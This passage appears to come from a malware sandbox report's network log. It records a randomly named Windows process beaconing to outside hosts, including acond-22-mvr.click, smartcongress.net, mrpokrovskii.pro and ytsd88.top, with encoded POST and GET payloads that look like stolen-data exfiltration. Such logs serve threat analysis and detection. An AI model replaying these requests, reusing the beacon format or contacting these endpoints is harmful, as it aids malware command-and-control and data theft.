                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49802 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 3812
Process: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
Timestamp: Nov 27, 2024 01:25:53.915714979 CET | Bytes transferred: 624 | Direction: OUT | Data:
POST /w9z4/ HTTP/1.1
                                                                                  Host: www.acond-22-mvr.click
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.acond-22-mvr.click
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=3+GoTPvyTIkI2U/obTYErMa2uxOnq+CMUVdCM+ZmNvdD+1DtTEVdb/rFAyU2U8b03F+JRwpGITB88SFFB4MbR8mlMQaSDOZQPRNwYTeJBz96s1v9aggeWu4K1ZfQl74ETE5q6rT6hsDS0ly+rJzya9ACMP6JhniGUFQDdNu5wWMMeiiu1DUsj8iNvyVaAmnsCBQaqjo=
                                                                                  Nov 27, 2024 01:25:55.001492977 CET   1236   IN   HTTP/1.1 200 OK
                                                                                  date: Wed, 27 Nov 2024 00:25:54 GMT
                                                                                  content-type: text/html; charset=utf-8
                                                                                  content-length: 1138
                                                                                  x-request-id: e9b8151e-3d91-42b3-a485-0390852fd5a2
                                                                                  cache-control: no-store, max-age=0
                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                  set-cookie: parking_session=e9b8151e-3d91-42b3-a485-0390852fd5a2; expires=Wed, 27 Nov 2024 00:40:54 GMT; path=/
                                                                                  connection: close
                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                  Nov 27, 2024 01:25:55.001558065 CET   591   IN
                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTliODE1MWUtM2Q5MS00MmIzLWE0ODUtMDM5MDg1MmZkNWEyIiwicGFnZV90aW1lIjoxNzMyNjY3MT


                                                                                  Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
                                                                                  6   192.168.2.5   49808   199.59.243.227   80   3812   C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp   Bytes transferred   Direction   Data
                                                                                  Nov 27, 2024 01:25:56.578525066 CET   644   OUT   POST /w9z4/ HTTP/1.1
                                                                                  Host: www.acond-22-mvr.click
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.acond-22-mvr.click
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=3+GoTPvyTIkI2xvoZ0EEssaxhROnwOCyUVBCM6o7N95DnRHtQFVde/rFLSUzLsbJ3Fj8RytGITV88T1FALUaeMmnKQacMuZQPRNwYTLiBwN6vFf9aFAfI+4N/5fQh74ATE5I6pnUhuLS0li+sYztT9AICv79wCf4RGILBuTHo2A3fUTEvhcEwcO1/hdtRWGFYiAq00+Nas8flm+SasxTFWMTDoTz
                                                                                  Nov 27, 2024 01:25:57.706832886 CET   1236   IN   HTTP/1.1 200 OK
                                                                                  date: Wed, 27 Nov 2024 00:25:57 GMT
                                                                                  content-type: text/html; charset=utf-8
                                                                                  content-length: 1138
                                                                                  x-request-id: 13efd7e8-3c5f-4b66-96df-16ed38e87b5f
                                                                                  cache-control: no-store, max-age=0
                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                  set-cookie: parking_session=13efd7e8-3c5f-4b66-96df-16ed38e87b5f; expires=Wed, 27 Nov 2024 00:40:57 GMT; path=/
                                                                                  connection: close
                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                  Nov 27, 2024 01:25:57.706887007 CET   591   IN
                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTNlZmQ3ZTgtM2M1Zi00YjY2LTk2ZGYtMTZlZDM4ZTg3YjVmIiwicGFnZV90aW1lIjoxNzMyNjY3MT


                                                                                  Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
                                                                                  7   192.168.2.5   49815   199.59.243.227   80   3812   C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp   Bytes transferred   Direction   Data
                                                                                  Nov 27, 2024 01:25:59.233505011 CET   1661   OUT   POST /w9z4/ HTTP/1.1
                                                                                  Host: www.acond-22-mvr.click
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.acond-22-mvr.click
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4= [TRUNCATED]
                                                                                  Nov 27, 2024 01:26:00.363328934 CET   1236   IN   HTTP/1.1 200 OK
                                                                                  date: Wed, 27 Nov 2024 00:25:59 GMT
                                                                                  content-type: text/html; charset=utf-8
                                                                                  content-length: 1138
                                                                                  x-request-id: 23e61a22-0fd6-4ee4-99af-5137eb840a35
                                                                                  cache-control: no-store, max-age=0
                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                  set-cookie: parking_session=23e61a22-0fd6-4ee4-99af-5137eb840a35; expires=Wed, 27 Nov 2024 00:41:00 GMT; path=/
                                                                                  connection: close
                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                  Nov 27, 2024 01:26:00.363392115 CET   591   IN
                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjNlNjFhMjItMGZkNi00ZWU0LTk5YWYtNTEzN2ViODQwYTM1IiwicGFnZV90aW1lIjoxNzMyNjY3MT


                                                                                  Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
                                                                                  8   192.168.2.5   49821   199.59.243.227   80   3812   C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp   Bytes transferred   Direction   Data
                                                                                  Nov 27, 2024 01:26:01.884886026 CET   364   OUT   GET /w9z4/?005PE=aNcLxhD894SLKl&lH_L4=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfbeeWLm23HuUFOBNObgSjIwBxlFn7Rit3IOIP+ZrZsKx+FQ== HTTP/1.1
                                                                                  Host: www.acond-22-mvr.click
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:26:02.972707987 CET   1236   IN   HTTP/1.1 200 OK
                                                                                  date: Wed, 27 Nov 2024 00:26:02 GMT
                                                                                  content-type: text/html; charset=utf-8
                                                                                  content-length: 1518
                                                                                  x-request-id: 073a4db1-d7d9-4780-997b-1a9e9ff40c0a
                                                                                  cache-control: no-store, max-age=0
                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fmHxTbi1rFHGbfjyNMnkulp0sp7KY+xyEGOi0E1vHixD9UpSV/X7x9vp6CvtrmRTyIu/A5Yo64d91hYPGAA9GA==
                                                                                  set-cookie: parking_session=073a4db1-d7d9-4780-997b-1a9e9ff40c0a; expires=Wed, 27 Nov 2024 00:41:02 GMT; path=/
                                                                                  connection: close
                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fmHxTbi1rFHGbfjyNMnkulp0sp7KY+xyEGOi0E1vHixD9UpSV/X7x9vp6CvtrmRTyIu/A5Yo64d91hYPGAA9GA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                  Nov 27, 2024 01:26:02.972793102 CET   971   IN
                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDczYTRkYjEtZDdkOS00NzgwLTk5N2ItMWE5ZTlmZjQwYzBhIiwicGFnZV90aW1lIjoxNzMyNjY3MT


                                                                                  Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
                                                                                  9   192.168.2.5   49839   146.88.233.115   80   3812   C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp   Bytes transferred   Direction   Data
                                                                                  Nov 27, 2024 01:26:09.389535904 CET   621   OUT   POST /11t3/ HTTP/1.1
                                                                                  Host: www.smartcongress.net
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.smartcongress.net
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.smartcongress.net/11t3/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=Mq/wbTVEdvZa7ulSFvsrrPBsSh3P4+feZlLFzTtR/948sZEPTlA4+lgyc4hvOzpqEn35HRY1kavrwj27H1s70JI5CBPkLLFbxG0jahhDDT+OZxDSSZ8DHYM1fbhB8zsdW4gLgV8/rkTAsf7Sppbp3jmE3usv0OXm/q0Yu1GBMSokuvHGKmWGG3WAk7q/Y9QCVqFd5UA=
                                                                                  Nov 27, 2024 01:26:10.930433035 CET   380   IN   HTTP/1.1 404 Not Found
                                                                                  content-type: text/html; charset=iso-8859-1
                                                                                  content-length: 196
                                                                                  date: Wed, 27 Nov 2024 00:26:10 GMT
                                                                                  server: LiteSpeed
                                                                                  x-tuned-by: N0C
                                                                                  connection: close
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                  Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
                                                                                  10   192.168.2.5   49845   146.88.233.115   80   3812   C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp   Bytes transferred   Direction   Data
                                                                                  Nov 27, 2024 01:26:12.047336102 CET   641   OUT   POST /11t3/ HTTP/1.1
                                                                                  Host: www.smartcongress.net
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.smartcongress.net
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.smartcongress.net/11t3/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=Mq/wbTVEdvZa6OVSHIAr+/BrOR3P3efaZlHFzSpB/PM817cPSkA49lgyJIhgQDpxEn7LHQk1ka7rwjG7GEs61ZI7JhPmErFbxG0jahl9DXaOZATST48MEYMyYbhBqDsZW4glgQAVrnnAsdzSp4ab5jmGo+toxvySy7IU0UzHazUFrZ2sQEeuVX640oiIJNxrPJVtnDVbBCPyQpe6W4BSMalrTtXV
                                                                                  Nov 27, 2024 01:26:13.309948921 CET    380    IN    HTTP/1.1 404 Not Found
                                                                                  content-type: text/html; charset=iso-8859-1
                                                                                  content-length: 196
                                                                                  date: Wed, 27 Nov 2024 00:26:13 GMT
                                                                                  server: LiteSpeed
                                                                                  x-tuned-by: N0C
                                                                                  connection: close
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                  11    192.168.2.5    49851    146.88.233.115    80    3812    C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                  Nov 27, 2024 01:26:14.705929041 CET    1658    OUT    POST /11t3/ HTTP/1.1
                                                                                  Host: www.smartcongress.net
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.smartcongress.net
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.smartcongress.net/11t3/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:26:16.123919964 CET    380    IN    HTTP/1.1 404 Not Found
                                                                                  content-type: text/html; charset=iso-8859-1
                                                                                  content-length: 196
                                                                                  date: Wed, 27 Nov 2024 00:26:15 GMT
                                                                                  server: LiteSpeed
                                                                                  x-tuned-by: N0C
                                                                                  connection: close
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                  12    192.168.2.5    49857    146.88.233.115    80    3812    C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                  Nov 27, 2024 01:26:17.359808922 CET    363    OUT    GET /11t3/?lH_L4=BoXQYlgPFtFW2+QaEcN/9vg3Pg7HxeD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL013x4IWAXPzPql46H99XQd8N1WVXRvZaJo9RbMIS7VF6QhjMA==&005PE=aNcLxhD894SLKl HTTP/1.1
                                                                                  Host: www.smartcongress.net
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:26:18.682638884 CET    380    IN    HTTP/1.1 404 Not Found
                                                                                  content-type: text/html; charset=iso-8859-1
                                                                                  content-length: 196
                                                                                  date: Wed, 27 Nov 2024 00:26:18 GMT
                                                                                  server: LiteSpeed
                                                                                  x-tuned-by: N0C
                                                                                  connection: close
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                  13    192.168.2.5    49875    109.70.26.37    80    3812    C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                  Nov 27, 2024 01:26:24.609863043 CET    618    OUT    POST /2pji/ HTTP/1.1
                                                                                  Host: www.mrpokrovskii.pro
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.mrpokrovskii.pro
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.mrpokrovskii.pro/2pji/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=35Kg7n3KcwIOVIBlnqrX16bEE/py4BUz47NolLsChEoEpk9ftevbgx8fZYhTEgDaOZhkYBbLCzanl8w6QyQV7DRruvYS93LZ/mh9cdSjj6QfUNnrJU1+VVp1Wsq0DO1P/IrnU9aUDdQAB7c6O+/+2hKNYnNM5AWYkTBuXDS6+ie2VOkS53KbVUkNcWRvnJUvjcnVzcA=


                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                  14    192.168.2.5    49881    109.70.26.37    80    3812    C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                  Nov 27, 2024 01:26:27.267924070 CET    638    OUT    POST /2pji/ HTTP/1.1
                                                                                  Host: www.mrpokrovskii.pro
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.mrpokrovskii.pro
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.mrpokrovskii.pro/2pji/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=35Kg7n3KcwIOHZxllN/XzabHaPpy2hU346xolKpHhRAEqA5frqbbnx8fMogZJADROZdaYFHLCzOnl+46RF8S6TRp3/YQlXLZ/mh9cdXGj84fV8XrI119JFp2eMq0Iu1U/IqCU8W6De4AB/Y6Oqr94hKLAHMm+VLGhQkiKyb4ujqYZYV4jVCzG0I1MFZY251G5/3ltLVeqSMSC4IFjiY4RL3fDfAs


                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                  15    192.168.2.5    49888    109.70.26.37    80    3812    C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                  Nov 27, 2024 01:26:29.924362898 CET    1655    OUT    POST /2pji/ HTTP/1.1
                                                                                  Host: www.mrpokrovskii.pro
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.mrpokrovskii.pro
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.mrpokrovskii.pro/2pji/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)


                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                  16    192.168.2.5    49895    109.70.26.37    80    3812    C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                  Nov 27, 2024 01:26:32.605792046 CET    362    OUT    GET /2pji/?005PE=aNcLxhD894SLKl&lH_L4=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT9yZ96oMLsgfQ1G9JdO2EtcszdOb7L0lpI3ZCf/THH8NE8w== HTTP/1.1
                                                                                  Host: www.mrpokrovskii.pro
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)


                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                  17    192.168.2.5    49958    47.76.213.197    80    3812    C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                  Nov 27, 2024 01:27:00.840353966 CET    600    OUT    POST /egqi/ HTTP/1.1
                                                                                  Host: www.ytsd88.top
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.ytsd88.top
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.ytsd88.top/egqi/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=W5fxfSf2hjR1GfHkGQ/FIDd20S1RPSJvMHfG51E8Bm6MKyVPBZBiHVlX7RnoL6bXU5QQLwVF3FOA2CGQAecaktd35KR97c68YlZ0lzb85+YqlCKX95hct/0e/jfWdC8AJ2y71/N4gQSD9vRZFekxqBtUVwrb2FLeC8JhzaIYhB2hsI6Ub2PuWoJmzL8EuGWJzWtv/g0=
                                                                                  Nov 27, 2024 01:27:02.412770033 CET    574    IN    HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:27:02 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 409
                                                                                  Connection: close
                                                                                  ETag: "66d016cf-199"
                                                                                  Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                  18    192.168.2.5    49964    47.76.213.197    80    3812    C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                  Nov 27, 2024 01:27:04.005177975 CET    620    OUT    POST /egqi/ HTTP/1.1
                                                                                  Host: www.ytsd88.top
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.ytsd88.top
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.ytsd88.top/egqi/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=W5fxfSf2hjR1H+3kA3rFOjd1qC1REyJ0MHjG5x9nBQKMKTlPAYBiUllXjBntFaa6U5sYLxpF3BeA2D2QAt0dk9dP1qR/j868YlZ0lznW5+Aqlz6X8bZfkf0d3DfWLC8MJ2yj1+BWgSqD9rdZGMMwzxtWRwrPy0zRIqFPvYVD/just+L+BUHGFIlejY0z/23gp19fh3iiUY0RG6B5etF/JvYdwphu
                                                                                  Nov 27, 2024 01:27:05.521507025 CET    574    IN    HTTP/1.1 404 Not Found
                                                                                  Server: nginx
